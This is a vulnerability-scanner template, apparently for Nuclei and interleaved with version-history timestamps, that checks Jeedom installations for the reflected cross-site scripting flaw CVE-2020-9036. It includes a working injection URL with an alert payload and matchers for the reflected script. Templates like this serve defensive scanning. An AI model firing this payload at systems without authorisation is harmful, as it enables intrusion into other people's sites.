2021-07-27 06:45:01 +00:00
id : CVE-2020-9036
info :
2022-09-08 13:28:46 +00:00
name : Jeedom <=4.0.38 - Cross-Site Scripting
2021-07-27 06:45:01 +00:00
author : pikpikcu
severity : medium
2022-09-08 13:28:46 +00:00
description : Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-07-27 11:42:32 +00:00
- https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9036
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-9036
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00113
2023-08-31 11:46:18 +00:00
epss-percentile : 0.44064
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : jeedom
product : jeedom
tags : cve,cve2020,xss,jeedom
2021-07-27 06:45:01 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-27 06:45:01 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-27 06:45:01 +00:00
words :
2021-07-27 11:42:32 +00:00
- '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
2021-07-27 06:45:01 +00:00
- type : word
part : header
words :
- text/html
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200